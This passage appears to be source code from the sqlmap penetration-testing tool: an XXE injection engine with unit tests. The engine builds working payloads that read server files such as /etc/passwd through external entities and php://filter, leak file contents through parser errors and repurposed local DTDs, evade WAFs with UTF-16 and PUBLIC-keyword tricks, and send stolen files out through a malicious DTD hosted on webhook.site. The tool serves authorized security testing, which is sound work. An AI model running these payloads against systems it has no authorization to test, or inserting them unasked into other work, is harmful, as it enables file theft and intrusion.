from lib.core.settings import ASTERISK_MARKER
from lib.core.settings import XXE_BLACKHOLE_HOST
from lib.core.settings import XXE_ERROR_SIGNATURES
from lib.core.settings import XXE_HARDENED_REGEX
from lib.core.settings import XXE_IMPACT_FILES
from lib.core.settings import OOB_EXFIL_DEFAULT_FILE
from lib.core.settings import OOB_POLL_ATTEMPTS
from lib.core.settings import OOB_POLL_DELAY
from lib.core.settings import XXE_LOCAL_DTDS
from lib.core.settings import XXE_TIME_THRESHOLD
from lib.request.connect import Connect as Request
# Fresh per-scan sentinel token. Deliberately a random opaque string (never
# root:x:0:0 or similar) so it cannot collide with a WAF honeypot signature and
# so its presence in a response is unambiguously our reflected/expanded value.
SENTINEL = randomStr(length=12, lowercase=True)
# First element of the document (skipping the <?xml?> prolog, comments and any
# DOCTYPE). Its name must match the DOCTYPE name or libxml2/Xerces reject the doc.
_ROOT_RE = re.compile(r"<\s*([A-Za-z_][\w.\-]*(?::[\w.\-]+)?)")
# A leaf text node: >text< with no markup/entities inside. Used to place an
# entity reference where the application is most likely to echo it back.
_TEXTNODE_RE = re.compile(r">(\s*[^<>&\s][^<>&]*)<")
def _looksXml(data):
data = (getText(data) or "").strip()
return data.startswith("<") and re.search(r"<[A-Za-z_?!]", data) is not None and '>' in data
def _cleanBody():
"""Return the original request body with sqlmap's injection marks removed.
Order matters: drop the injected custom marks first (any literal '*' from the
original body was already escaped to ASTERISK_MARKER by target processing),
then restore those escaped asterisks."""
data = getText(conf.data or "")
data = data.replace(kb.customInjectionMark or "\x00", "")
data = data.replace(ASTERISK_MARKER, "*")
return data.lstrip(u"\ufeff\ufffe") # drop a leading BOM so root/DOCTYPE handling stays correct
def _rootName(xml):
stripped = re.sub(r"<\?.*?\?>", "", xml, flags=re.DOTALL)
stripped = re.sub(r"<!--.*?-->", "", stripped, flags=re.DOTALL)
stripped = re.sub(r"<!DOCTYPE[^>]*(?:\[[^\]]*\])?\s*>", "", stripped, flags=re.DOTALL)
match = _ROOT_RE.search(stripped)
return match.group(1) if match else None
def _auxHeaders():
"""Send an XML content-type unless the user already pinned one (via -H/-r)."""
for name, _ in (conf.httpHeaders or []):
if (name or "").lower() == HTTP_HEADER.CONTENT_TYPE.lower():
return None
return {HTTP_HEADER.CONTENT_TYPE: POST_HINT_CONTENT_TYPES.get(kb.postHint) or "application/xml"}
def _send(body):
"""Issue one request with a fully-crafted XML body, preserving sqlmap's normal
request machinery (URL, cookies, headers, proxy, delay) for everything else."""
if conf.delay:
time.sleep(conf.delay)
try:
if conf.verbose >= 3:
logger.log(CUSTOM_LOGGING.PAYLOAD, getUnicode(body))
page, _, _ = Request.getPage(post=body, method=conf.method, auxHeaders=_auxHeaders(), raise404=False, silent=True)
return page or ""
except Exception as ex:
logger.debug("XXE probe request failed: %s" % getUnicode(ex))
return ""
def _buildDoctype(xml, rootName, internalSubset):
"""Prepend (or extend) a DOCTYPE carrying `internalSubset` into `xml`.
A document may already declare a DOCTYPE - injecting a second one is invalid
XML and every parser rejects it, so we splice into the existing declaration
instead (into its internal subset, or by adding one to a subset-less DOCTYPE)."""
existing = re.search(r"<!DOCTYPE\s+[^>\[]*\[", xml)
if existing:
# Splice our declarations into the existing internal subset.
insertAt = xml.index('[', existing.start()) + 1
return xml[:insertAt] + "\n" + internalSubset + "\n" + xml[insertAt:]
subsetless = re.search(r"<!DOCTYPE\s+[^>\[]*>", xml)
if subsetless:
# DOCTYPE with an external id but no internal subset (e.g. SYSTEM "x.dtd"):
# add an internal subset before its closing '>' (both may legally coexist).
close = xml.index('>', subsetless.start())
return xml[:close] + " [\n" + internalSubset + "\n]" + xml[close:]
doctype = "<!DOCTYPE %s [\n%s\n]>" % (rootName, internalSubset)
prolog = re.match(r"\s*<\?xml.*?\?>", xml, flags=re.DOTALL)
if prolog:
end = prolog.end()
return xml[:end] + "\n" + doctype + xml[end:]
return doctype + "\n" + xml
def _placeRef(xml, snippet, attrs=False):
"""Insert `snippet` (an entity reference or an XInclude element) into EVERY leaf
text node - not just the first - so detection does not depend on which field the
application happens to reflect. When `attrs` is set (internal-entity tier only),
also seed existing attribute values, since a general internal entity legally
expands inside an attribute (external entity refs do NOT - never seed attributes
for the external/XInclude tiers or the document becomes ill-formed). Falls back to
injecting just before the root's closing tag when there is no text node at all."""
start = re.search(r"\]>", xml).end() if "]>" in xml else 0
head, tail = xml[:start], xml[start:]
tail, count = _TEXTNODE_RE.subn(lambda _: ">" + snippet + "<", tail)
if attrs:
# Seed every attribute value except namespace declarations (xmlns / xmlns:*),
# whose rewriting would break the document. Only touches simple, entity-free
# values (the '[^"\'<>&]*' class) so we never corrupt existing markup.
tail, acount = re.subn(r'''(\s(?!xmlns[:=])[\w.:-]+\s*=\s*)("|')[^"'<>&]*\2''',
lambda m: "%s%s%s%s" % (m.group(1), m.group(2), snippet, m.group(2)), tail)
count += acount
if count:
return head + tail
rootName = _rootName(xml)
if rootName:
close = "</%s>" % rootName
if close in xml:
idx = xml.rindex(close)
return xml[:idx] + snippet + xml[idx:]
# self-closing root: <root/> -> <root>snippet</root>
selfClose = re.search(r"<%s\b[^>]*/>" % re.escape(rootName), xml)
if selfClose:
tag = selfClose.group(0)
opened = tag[:-2] + ">" + snippet + close
return xml[:selfClose.start()] + opened + xml[selfClose.end():]
return xml
def _fingerprint(page):
page = getUnicode(page or "")
for family, regex in XXE_ERROR_SIGNATURES:
if re.search(regex, page):
return family
return None
def _echoed(page):
"""True when the response mirrors our raw markup back. Essential guard for the
sentinel-in-path oracles: a debug/echo endpoint that never parses XML would
otherwise reflect the sentinel (it is inside the body we sent) and look like a
genuine parser error. A real error surfaces only the path/message, not the
DOCTYPE/entity declarations."""
page = getUnicode(page or "")
return "<!DOCTYPE" in page or "<!ENTITY" in page
def _report(title, payload):
if conf.beep:
beep()
conf.dumper.singleString("---\nParameter: XML body ((custom) POST)\n Type: XXE injection\n Title: %s\n Payload: %s\n---" % (title, payload))
def _dumpFileRead(remoteFile, content):
"""Save an XXE-read file to the output directory (parity with '--file-read') and
list it; fall back to a console dump if the file cannot be written."""
try:
localPath = dataToOutFile(remoteFile, getBytes(content))
if localPath:
conf.dumper.rFile([localPath])
return
except Exception as ex:
logger.debug("could not save XXE-read file to disk: %s" % getUnicode(ex))
conf.dumper.singleString("XXE file read ('%s'):\n%s" % (remoteFile, content))
def _tryInternal(xml, rootName, baseline):
"""T2 in-band: an internal general entity expands to the sentinel and is
reflected. Guarded by a negative control (sentinel absent from baseline) and
a raw-echo guard (the literal '&ent;' must NOT survive - that would mean the
app merely mirrors the body without parsing entities)."""
ent = randomStr(length=8, lowercase=True)
subset = '<!ENTITY %s "%s">' % (ent, SENTINEL)
payload = _placeRef(_buildDoctype(xml, rootName, subset), "&%s;" % ent, attrs=True)
page = _send(payload)
if SENTINEL in page and ("&%s;" % ent) not in page and not _echoed(page) and SENTINEL not in baseline:
return payload, page
return None, page
def _confirmRead(page, pattern, baseline):
"""Return the first response line that matches a known file-content signature
and is absent from the baseline. The baseline guard is essential: it stops a
generic short reply (e.g. 'received', 'ok') from matching a loose pattern."""
baselineLines = set(_.strip() for _ in getUnicode(baseline or "").splitlines())
for line in getUnicode(page).splitlines():
line = line.strip()
if line and line not in baselineLines and re.search(pattern, line):
return line
return None
def _tryInbandFileRead(xml, rootName, fileName):
"""Read an arbitrary file IN-BAND on a reflective target: place the external
entity between two random markers so the exact file content can be sliced out
of the response regardless of surrounding template. Raw file:// works for text
files; php://filter base64 (PHP) carries files with XML-special bytes. Returns
the file content or None."""
from lib.core.convert import decodeBase64
resource = fileName if fileName.startswith("/") else "/" + fileName
m1, m2 = randomStr(8, lowercase=True), randomStr(8, lowercase=True)
for systemId, isB64 in (("file://%s" % resource, False),
("php://filter/convert.base64-encode/resource=%s" % resource, True)):
ent = randomStr(8, lowercase=True)
subset = '<!ENTITY %s SYSTEM "%s">' % (ent, systemId)
payload = _placeRef(_buildDoctype(xml, rootName, subset), "%s&%s;%s" % (m1, ent, m2))
page = getUnicode(_send(payload))
match = re.search(re.escape(m1) + r"(.*?)" + re.escape(m2), page, re.DOTALL)
if not match:
continue
data = match.group(1)
if not data.strip() or ("&%s;" % ent) in data: # empty read or un-expanded echo
continue
if isB64:
try:
data = getText(decodeBase64(data.strip()))
except Exception:
continue
if data and data.strip():
return data
return None
def _tryExternalFile(xml, rootName, baseline):
"""Impact demonstration once XXE is live: read a benign host-identity file via
an external general entity. Returns (systemId, snippet) on a confirmed read."""
for systemId, pattern in XXE_IMPACT_FILES:
ent = randomStr(length=8, lowercase=True)
subset = '<!ENTITY %s SYSTEM "%s">' % (ent, systemId)
payload = _placeRef(_buildDoctype(xml, rootName, subset), "&%s;" % ent)
snippet = _confirmRead(_send(payload), pattern, baseline)
if snippet:
return systemId, snippet
return None, None
def _tryPhpFilter(xml, rootName, baseline):
"""PHP-only in-band read that survives newlines/binary: base64 a source file
through php://filter. Confirmed when the reflection decodes to file content."""
from lib.core.convert import decodeBase64
baselineTokens = set(re.findall(r"[A-Za-z0-9+/]{16,}={0,2}", getUnicode(baseline or "")))
for systemId, pattern in (("file:///etc/passwd", r":0:0:"), ("file:///etc/os-release", r"(?i)^(?:NAME|ID|VERSION)=")):
resource = systemId[len("file://"):]
ent = randomStr(length=8, lowercase=True)
subset = '<!ENTITY %s SYSTEM "php://filter/convert.base64-encode/resource=%s">' % (ent, resource)
payload = _placeRef(_buildDoctype(xml, rootName, subset), "&%s;" % ent)
page = _send(payload)
for token in re.findall(r"[A-Za-z0-9+/]{16,}={0,2}", getUnicode(page)):
if token in baselineTokens:
continue
try:
decoded = getText(decodeBase64(token))
except Exception:
continue
if decoded and re.search(pattern, decoded, re.M):
return payload
return None
def _tryError(xml, rootName):
"""T3 error-based: a parameter entity points at a non-existent path carrying
the sentinel. Confirmed when the sentinel surfaces inside a parser error."""
subset = '<!ENTITY %% xxe SYSTEM "file:///%s/nonexistent">\n%%xxe;' % SENTINEL
payload = _buildDoctype(xml, rootName, subset)
page = _send(payload)
if SENTINEL in page and not _echoed(page):
return payload, page
return None, page
def _tryLocalDtd(xml, rootName):
"""T3b no-egress error-based: repurpose an on-disk DTD, redefine one of its
parameter entities to load a sentinel path, and read the sentinel back out of
the resulting parser error - no outbound network required."""
for dtdPath, entName in XXE_LOCAL_DTDS:
subset = (
'<!ENTITY %% local_dtd SYSTEM "%s">\n'
"<!ENTITY %% %s '<!ENTITY &#x25; xxe SYSTEM \"file:///%s/nonexistent\">&#x25;xxe;'>\n"
"%%local_dtd;"
) % (dtdPath, entName, SENTINEL)
payload = _buildDoctype(xml, rootName, subset)
page = _send(payload)
if SENTINEL in page and not _echoed(page):
return payload, page
return None, ""
def _tryErrorExfil(xml, rootName):
"""In-band error-based file EXFILTRATION: coerce the parser into an error whose
message embeds the target file's contents (not just a sentinel). Two vehicles:
(a) repurpose a local on-disk DTD -> NO egress at all, or (b) a DTD we host on
the exfil service -> needs egress to fetch it plus verbose errors. php://filter
base64 carries a whole multi-line file intact; raw file:// leaks the first line
on any parser. Returns (content, filename) or (None, None)."""
from lib.core.convert import decodeBase64
fileName = conf.get("fileRead") or OOB_EXFIL_DEFAULT_FILE
resource = fileName if fileName.startswith("/") else "/" + fileName
marker = randomStr(10, lowercase=True)
# (systemId, isBase64): base64 first (whole file, PHP), raw fallback (first line, any parser)
reads = (("php://filter/convert.base64-encode/resource=%s" % resource, True),
("file://%s" % resource, False))
def _extract(page, isB64):
pattern = (r"file:/+%s/([A-Za-z0-9+/=]+)" if isB64 else r"file:/+%s/([^\s'\"<>;)]+)") % re.escape(marker)
match = re.search(pattern, getUnicode(page))
if not match:
return None
if isB64:
try:
return getText(decodeBase64(match.group(1))) or None
except Exception:
return None
return match.group(1)
# (a) local-DTD repurposing - no egress
for dtdPath, entName in XXE_LOCAL_DTDS:
for systemId, isB64 in reads:
inner = ('<!ENTITY &#x25; file SYSTEM "%s">'
'<!ENTITY &#x25; eval "<!ENTITY &#x26;#x25; error SYSTEM &#x27;file:///%s/&#x25;file;&#x27;>">'
'&#x25;eval;&#x25;error;') % (systemId, marker)
subset = '<!ENTITY %% local_dtd SYSTEM "%s">\n<!ENTITY %% %s \'%s\'>\n%%local_dtd;' % (dtdPath, entName, inner)
content = _extract(_send(_buildDoctype(xml, rootName, subset)), isB64)
if content:
return content, fileName
# (b) DTD we host on the exfil service - egress + verbose errors (third party)
if not _oobEnabled():
return None, None
from lib.request.webhooksite import WebhookSite
wh = WebhookSite()
for systemId, isB64 in reads:
dtd = ('<!ENTITY %% file SYSTEM "%s">\n'
'<!ENTITY %% eval "<!ENTITY &#x25; error SYSTEM \'file:///%s/%%file;\'>">\n'
'%%eval;\n%%error;') % (systemId, marker)
token = wh.newToken(dtd)
if not token:
break
content = _extract(_send(_buildDoctype(xml, rootName, '<!ENTITY %% dtd SYSTEM "%s"> %%dtd;' % wh.hostUrl(token))), isB64)
if content:
return content, fileName
return None, None
def _tryXInclude(xml, rootName, baseline):
"""T4 fallback when DOCTYPE/entities are unavailable: XInclude a benign file as
text. Confirmed when the file content appears in the response (baseline-guarded)."""
for systemId, pattern in XXE_IMPACT_FILES:
snippet = '<xi:include xmlns:xi="http://www.w3.org/2001/XInclude" href="%s" parse="text"/>' % systemId
payload = _placeRef(xml, snippet)
confirmed = _confirmRead(_send(payload), pattern, baseline)
if confirmed:
return payload, systemId, confirmed
return None, None, None
def _tryEvasions(xml, rootName, baseline):
"""T5 WAF-evasion fallbacks, tried only when the straightforward tiers fail.
Each transform keeps the payload semantically identical while defeating a
common naive filter, so a reachable-but-filtered parser can still be caught.
Returns (title, payload) on a confirmed hit."""
# (1) UTF-16 re-encoding: libxml2/Xerces honor the BOM-declared encoding while
# ASCII byte-signature WAFs (grepping for "<!ENTITY"/"SYSTEM") miss it.
ent = randomStr(length=8, lowercase=True)
subset = '<!ENTITY %s "%s">' % (ent, SENTINEL)
body = _placeRef(_buildDoctype(xml, rootName, subset), "&%s;" % ent)
page = _send(getText(body).encode("utf-16")) # BOM-prefixed UTF-16, py2/py3 alike
if SENTINEL in page and not _echoed(page) and SENTINEL not in baseline:
return "In-band via UTF-16 re-encoding (WAF evasion)", getUnicode(body)
# (2) PUBLIC keyword instead of SYSTEM: bypasses filters that only blocklist
# the SYSTEM identifier; the second literal is still the resolved system id.
subset = '<!ENTITY %% xxe PUBLIC "-//sqlmap//XXE//EN" "file:///%s/nonexistent">\n%%xxe;' % SENTINEL
body = _buildDoctype(xml, rootName, subset)
page = _send(body)
if SENTINEL in page and not _echoed(page):
return "Error-based via PUBLIC keyword (WAF evasion)", body
return None, None
def _timed(body, timeout):
"""One request, returning wall-clock seconds. ignoreTimeout keeps a stalled
parser from raising, so the elapsed time itself is the signal."""
start = time.time()
try:
Request.getPage(post=body, method=conf.method, auxHeaders=_auxHeaders(),
raise404=False, silent=True, ignoreTimeout=True, timeout=timeout)
except Exception:
pass
return time.time() - start
def _tryTimeBlind(xml, rootName):
"""T6 last-resort blind detection with NO collector: an external parameter
entity aimed at a non-routable TEST-NET host stalls a fetching parser on the
connection. Confirmed only on a large, reproducible delay measured against a
DTD-processing control (an internal parameter entity, no fetch) - so DTD
overhead alone cannot trip it and only the outbound-fetch stall counts."""
control = _buildDoctype(xml, rootName, '<!ENTITY %% c "x">\n%%c;')
baseline = max(_timed(control, conf.timeout), _timed(control, conf.timeout))
threshold = baseline + XXE_TIME_THRESHOLD
probeTimeout = min(conf.timeout, int(baseline) + XXE_TIME_THRESHOLD + 3)
# Bound each stalled probe: the per-call timeout kwarg does not reach a pooled
# socket, so cap via conf.timeout (the value the connection actually uses) and
# drop conf.retries so a stall is not re-sent. Restored in finally.
_timeout, _retries = conf.timeout, conf.retries
conf.timeout, conf.retries = probeTimeout, 0
try:
subset = '<!ENTITY %% x SYSTEM "http://%s/%s">\n%%x;' % (XXE_BLACKHOLE_HOST, SENTINEL)
payload = _buildDoctype(xml, rootName, subset)
if _timed(payload, probeTimeout) < threshold:
return None
if _timed(payload, probeTimeout) < threshold: # must reproduce
return None
return payload
finally:
conf.timeout, conf.retries = _timeout, _retries
def _oobEnabled():
"""Out-of-band tiers contact a public third party by default. Honour an explicit
opt-out (`--oob-server none`) for sensitive engagements."""
return (conf.get("oobServer") or "").strip().lower() not in ("none", "off", "0", "no", "disable", "false")
def _tryOobExfil(xml, rootName):
"""T7 out-of-band EXFILTRATION for blind XXE: host a malicious external DTD on
a public content+logging service (webhook.site), point the target's parser at
it, and read the file it ships back out. The DTD uses the classic nested
parameter-entity chain (only valid in an EXTERNAL DTD) and php://filter base64
so any file survives the callback URL. The DTD-fetch itself doubles as blind
detection. Reads conf.fileRead if given, else a benign default. Returns a dict
{payload, filename, content, detected} or None if the service is unusable."""
from lib.core.convert import decodeBase64
from lib.request.webhooksite import WebhookSite
wh = WebhookSite()
exfilToken = wh.newToken()
if not exfilToken:
logger.debug("out-of-band exfiltration tier skipped (could not reach the exfil service)")
return None
target = conf.get("fileRead") or OOB_EXFIL_DEFAULT_FILE
exfilUrl = "%s/?x=%%file;" % wh.hostUrl(exfilToken)
dtd = ('<!ENTITY %% file SYSTEM "php://filter/convert.base64-encode/resource=%s">\n'
'<!ENTITY %% eval "<!ENTITY &#x25; exfil SYSTEM \'%s\'>">\n'
'%%eval;\n%%exfil;') % (target, exfilUrl)
dtdToken = wh.newToken(dtd)
if not dtdToken:
return None
singleTimeWarnMessage("using public out-of-band exfiltration service '%s' for blind XXE" % wh.endpoint)
payload = _buildDoctype(xml, rootName, '<!ENTITY %% dtd SYSTEM "%s"> %%dtd;' % wh.hostUrl(dtdToken))
_send(payload)
content, detected = None, False
for _ in range(OOB_POLL_ATTEMPTS):
time.sleep(OOB_POLL_DELAY)
for record in wh.captured(exfilToken):
leaked = (record.get("query") or {}).get("x")
if leaked:
try:
content = getText(decodeBase64(leaked))
except Exception:
content = getText(leaked)
break
if content:
break
if not detected and wh.captured(dtdToken):
detected = True # the target fetched our DTD -> blind XXE confirmed even without exfil
if not detected:
detected = bool(wh.captured(dtdToken))
return {"payload": payload, "filename": target, "content": content, "detected": detected}
def _tryOob(xml, rootName):
"""T7 blind confirmation via an out-of-band collector (interactsh): an external
parameter entity points at a unique callback URL. If the target's parser fetches
it (or even just resolves its DNS), the collector records the interaction and we
poll it back - definitive proof of blind XXE with egress, and it names the
channel (HTTP vs DNS-only). Returns (payload, protocol) or None."""
from lib.request.interactsh import Interactsh, hasCrypto
if not hasCrypto():
logger.debug("out-of-band blind XXE tier skipped (optional 'pycryptodome' not installed)")
return None
client = Interactsh(server=conf.get("oobServer"))
if not client.registered:
logger.debug("out-of-band blind XXE tier skipped (could not register with an interaction server)")
return None
singleTimeWarnMessage("using out-of-band interaction server '%s' for blind XXE confirmation (override with '--oob-server')" % client.server)
try:
url = client.url()
subset = '<!ENTITY %% oob SYSTEM "%s">\n%%oob;' % url
payload = _buildDoctype(xml, rootName, subset)
_send(payload)
interactions = client.pollUntil(OOB_POLL_ATTEMPTS, OOB_POLL_DELAY)
if interactions:
protocols = sorted(set((_.get("protocol") or "?").upper() for _ in interactions))
return payload, ", ".join(protocols)
finally:
client.close()
return None
def xxeScan():
global SENTINEL
SENTINEL = randomStr(length=12, lowercase=True)
debugMsg = "'--xxe' is self-contained: it detects XML External Entity injection "
debugMsg += "in the request body and demonstrates file-read impact. SQL enumeration "
debugMsg += "switches (--banner, --dbs, --tables, --dump) are ignored"
logger.debug(debugMsg)
xml = _cleanBody()
if not _looksXml(xml):
logger.error("no XML body found to test (provide an XML request body via '--data' or '-r')")
return
rootName = _rootName(xml)
if not rootName:
logger.error("could not locate the document root element in the XML body")
return
logger.info("testing XXE injection on the XML request body (root element: '%s')" % rootName)
baseline = _send(xml)
found = False
# T2: in-band reflected (internal entity expansion) - the strongest oracle
payload, page = _tryInternal(xml, rootName, baseline)
if payload:
found = True
logger.info("the XML body is vulnerable to XXE injection (in-band, entity expansion enabled)")
_report("In-band (reflected internal entity)", payload)
if conf.get("fileRead"):
content = _tryInbandFileRead(xml, rootName, conf.fileRead)
if content:
logger.info("in-band file read of '%s' succeeded" % conf.fileRead)
_report("In-band file read ('%s')" % conf.fileRead, "<in-band reflected read of '%s'>" % conf.fileRead)
_dumpFileRead(conf.fileRead, content)
systemId, snippet = _tryExternalFile(xml, rootName, baseline)
if systemId:
logger.info("file-read impact confirmed via external entity ('%s'): '%s'" % (systemId, snippet))
_report("Out-of-band file read (external entity '%s')" % systemId, "<!ENTITY xxe SYSTEM \"%s\"> -> %s" % (systemId, snippet))
else:
phpPayload = _tryPhpFilter(xml, rootName, baseline)
if phpPayload:
logger.info("file-read impact confirmed via php://filter (base64 source disclosure)")
_report("File read via php://filter (base64)", phpPayload)
# T3: error-based (works where entities are not reflected but errors leak)
errorChannel = False
if not found:
payload, page = _tryError(xml, rootName)
if payload:
found = errorChannel = True
backend = _fingerprint(page) or "Generic XML"
logger.info("the XML body is vulnerable to XXE injection (error-based, back-end parser: '%s')" % backend)
_report("Error-based (parameter entity, back-end: '%s')" % backend, payload)
# T3b: no-egress error-based via local-DTD repurposing
if not found:
payload, page = _tryLocalDtd(xml, rootName)
if payload:
found = errorChannel = True
backend = _fingerprint(page) or "Generic XML"
logger.info("the XML body is vulnerable to XXE injection (error-based via local-DTD repurposing, no egress required)")
_report("Error-based (local-DTD repurposing, back-end: '%s')" % backend, payload)
# T3c: error-based FILE EXFILTRATION - upgrade a confirmed error channel to an
# in-band file read (or attempt it directly when the user asked via --file-read)
if errorChannel or conf.get("fileRead"):
content, fileName = _tryErrorExfil(xml, rootName)
if content:
found = True
logger.info("the XML body is vulnerable to XXE injection (error-based in-band file read of '%s')" % fileName)
_report("Error-based in-band file read ('%s')" % fileName, "<error-based exfiltration of '%s'>" % fileName)
_dumpFileRead(fileName, content)
# T4: XInclude fallback (no DOCTYPE/entity control needed)
if not found:
payload, systemId, snippet = _tryXInclude(xml, rootName, baseline)
if payload:
found = True
logger.info("the XML body is vulnerable to XInclude file read ('%s'): '%s'" % (systemId, snippet))
_report("XInclude file read ('%s')" % systemId, payload)
# T5: WAF-evasion fallbacks (UTF-16 re-encoding, PUBLIC-for-SYSTEM)
if not found:
title, payload = _tryEvasions(xml, rootName, baseline)
if title:
found = True
logger.info("the XML body is vulnerable to XXE injection (%s)" % title.lower())
_report(title, payload)
# T6: time-based blind (no collector, no third party) - external entity to a non-routable host
if not found:
logger.debug("attempting time-based blind XXE (external entity to a non-routable host); this can be slow")
payload = _tryTimeBlind(xml, rootName)
if payload:
found = True
logger.info("the XML body is vulnerable to XXE injection (time-based blind, external entity resolution reaches out-of-band)")
_report("Time-based blind (external entity to non-routable host)", payload)
# T7: out-of-band exfiltration via a hosted malicious DTD (also confirms blind XXE)
if not found and _oobEnabled():
exfil = _tryOobExfil(xml, rootName)
if exfil and (exfil["content"] or exfil["detected"]):
found = True
if exfil["content"]:
logger.info("the XML body is vulnerable to blind XXE injection (out-of-band file read of '%s')" % exfil["filename"])
_report("Out-of-band blind file read ('%s')" % exfil["filename"], exfil["payload"])
_dumpFileRead(exfil["filename"], exfil["content"])
else:
logger.info("the XML body is vulnerable to blind XXE injection (out-of-band, target fetched the hosted DTD)")
_report("Out-of-band blind (hosted-DTD callback)", exfil["payload"])
# T8: out-of-band blind confirmation via an interaction server (DNS+HTTP callback)
if not found and _oobEnabled():
result = _tryOob(xml, rootName)
if result:
payload, protocol = result
found = True
logger.info("the XML body is vulnerable to XXE injection (out-of-band, confirmed via %s interaction with the collector)" % protocol)
_report("Out-of-band blind (collector callback: %s)" % protocol, payload)
if not found:
# Reachable-but-not-exploitable diagnostics: distinguish a hardened parser
# from a merely non-reflecting one so the user knows why it did not fire.
probe = _send(_buildDoctype(xml, rootName, '<!ENTITY %% p SYSTEM "file:///%s">%%p;' % SENTINEL))
if re.search(XXE_HARDENED_REGEX, getUnicode(probe)):
logger.info("the XML parser is reachable but appears hardened against XXE (DTD/external entities refused)")
else:
backend = _fingerprint(probe)
if backend:
logger.info("the XML body reaches a parser (back-end: '%s') but no XXE oracle could be established" % backend)
logger.warning("the XML body does not appear to be injectable via XXE")
return
logger.info("XXE scan complete")

View file

@ -23,7 +23,7 @@ sys.path.insert(0, os.path.dirname(os.path.abspath(__file__)))
sys.path.insert(0, os.path.join(os.path.dirname(os.path.abspath(__file__)), ".."))
from lib.core.settings import MAX_DNS_REQUESTS
from lib.request.dns import DNSQuery, DNSServer
from lib.request.dns import DNSQuery, DNSServer, InteractshDNSServer
def build_query(name, tid=b"\x12\x34", qtype=1):
@ -324,3 +324,41 @@ class TestDNSServerConcurrency(unittest.TestCase):
if __name__ == "__main__":
unittest.main(verbosity=2)
class TestInteractshDNSServer(unittest.TestCase):
"""The interactsh-backed DNS collector must present the same pop(prefix, suffix)
accounting as DNSServer, matching only prefix.<result>.suffix names and never
returning the same captured lookup twice."""
def _collector(self, names):
class _FakeClient(object):
registered = True
def dnsDomain(self): return "corr0000000000000nnc.oast.fun"
def dnsNames(self): return list(names)
srv = InteractshDNSServer.__new__(InteractshDNSServer)
srv._client = _FakeClient()
srv.domain = srv._client.dnsDomain()
srv._seen = set()
srv._running = True
srv._initialized = True
return srv
def test_pop_matches_prefix_suffix_and_dedups(self):
names = ["aaa.5345435245540a.zzz.corr0000000000000nnc", "unrelated.corr0000000000000nnc"]
srv = self._collector(names)
got = srv.pop("aaa", "zzz")
self.assertEqual(got, "aaa.5345435245540a.zzz.corr0000000000000nnc")
self.assertIsNone(srv.pop("aaa", "zzz")) # already consumed
def test_pop_no_match(self):
srv = self._collector(["aaa.deadbeef.qqq.corr0000000000000nnc"])
self.assertIsNone(srv.pop("aaa", "zzz"))
def test_pop_any(self):
srv = self._collector(["whatever.corr0000000000000nnc"])
self.assertEqual(srv.pop(), "whatever.corr0000000000000nnc")
def test_run_is_noop(self):
self._collector([]).run() # must not raise

236
tests/test_xxe.py Normal file
View file

@ -0,0 +1,236 @@
#!/usr/bin/env python
"""
Copyright (c) 2006-2026 sqlmap developers (https://sqlmap.org)
See the file 'LICENSE' for copying permission
Offline, deterministic tests for the XXE injection engine. Pure helpers are exercised
directly; detection tiers run against a mocked _send() so reflected/error/echo oracles
can be simulated without a live target; and crafted payloads are parsed with real lxml
to prove they are well-formed and actually expand the injected entity.
"""
import os
import re
import sys
import unittest
sys.path.insert(0, os.path.dirname(os.path.abspath(__file__)))
from _testutils import bootstrap
bootstrap()
import lib.techniques.xxe.inject as xxe
from lib.core.data import conf
from lib.core.data import kb
class TestLooksXmlAndClean(unittest.TestCase):
def test_looks_xml(self):
self.assertTrue(xxe._looksXml("<user><name>x</name></user>"))
self.assertTrue(xxe._looksXml(" <?xml version='1.0'?><r/>"))
self.assertFalse(xxe._looksXml("id=1&name=x"))
self.assertFalse(xxe._looksXml("{\"a\": 1}"))
self.assertFalse(xxe._looksXml(""))
def test_clean_body_strips_marks_and_bom(self):
conf.data = u"\ufeff<user><name>luther%s</name></user>" % (kb.customInjectionMark or "*")
cleaned = xxe._cleanBody()
self.assertFalse(cleaned.startswith(u"\ufeff"))
self.assertNotIn(kb.customInjectionMark or "*", cleaned)
self.assertTrue(cleaned.startswith("<user>"))
class TestRootName(unittest.TestCase):
def test_plain(self):
self.assertEqual(xxe._rootName("<user><name>x</name></user>"), "user")
def test_with_prolog_and_comment(self):
self.assertEqual(xxe._rootName("<?xml version='1.0'?><!-- hi --><order id='1'>x</order>"), "order")
def test_namespaced(self):
self.assertEqual(xxe._rootName('<soap:Envelope xmlns:soap="x"><b/></soap:Envelope>'), "soap:Envelope")
def test_existing_doctype_skipped(self):
self.assertEqual(xxe._rootName('<!DOCTYPE user SYSTEM "u.dtd"><user/>'), "user")
class TestBuildDoctype(unittest.TestCase):
SUBSET = '<!ENTITY x "y">'
def test_no_doctype_prepended(self):
out = xxe._buildDoctype("<r>x</r>", "r", self.SUBSET)
self.assertIn("<!DOCTYPE r [", out)
self.assertIn(self.SUBSET, out)
def test_after_prolog(self):
out = xxe._buildDoctype("<?xml version='1.0'?><r>x</r>", "r", self.SUBSET)
self.assertLess(out.index("<?xml"), out.index("<!DOCTYPE"))
def test_existing_internal_subset_spliced(self):
out = xxe._buildDoctype("<!DOCTYPE r [<!ELEMENT r ANY>]><r>x</r>", "r", self.SUBSET)
self.assertEqual(out.count("<!DOCTYPE"), 1) # no second DOCTYPE
self.assertIn(self.SUBSET, out)
def test_subsetless_doctype_extended(self):
out = xxe._buildDoctype('<!DOCTYPE r SYSTEM "r.dtd"><r>x</r>', "r", self.SUBSET)
self.assertEqual(out.count("<!DOCTYPE"), 1) # extended, not duplicated
self.assertIn(self.SUBSET, out)
self.assertIn("[", out)
class TestPlaceRef(unittest.TestCase):
def test_all_text_nodes(self):
out = xxe._placeRef("<p><a>one</a><b>two</b></p>", "&e;")
self.assertEqual(out.count("&e;"), 2)
self.assertNotIn("one", out)
self.assertNotIn("two", out)
def test_attributes_only_when_requested(self):
text = '<u id="1"><n>luther</n></u>'
self.assertNotIn('id="&e;"', xxe._placeRef(text, "&e;")) # attrs off by default
self.assertIn('id="&e;"', xxe._placeRef(text, "&e;", attrs=True)) # attrs on
def test_xmlns_preserved(self):
out = xxe._placeRef('<soap:E xmlns:soap="ns"><b>x</b></soap:E>', "&e;", attrs=True)
self.assertIn('xmlns:soap="ns"', out) # namespace decl untouched
def test_self_closing_fallback(self):
out = xxe._placeRef("<r/>", "&e;")
self.assertIn("&e;", out)
self.assertIn("</r>", out)
def test_empty_element_fallback(self):
out = xxe._placeRef("<r></r>", "&e;")
self.assertIn("<r>&e;</r>", out)
class TestGuards(unittest.TestCase):
def test_echoed(self):
self.assertTrue(xxe._echoed("... <!DOCTYPE r [ ... "))
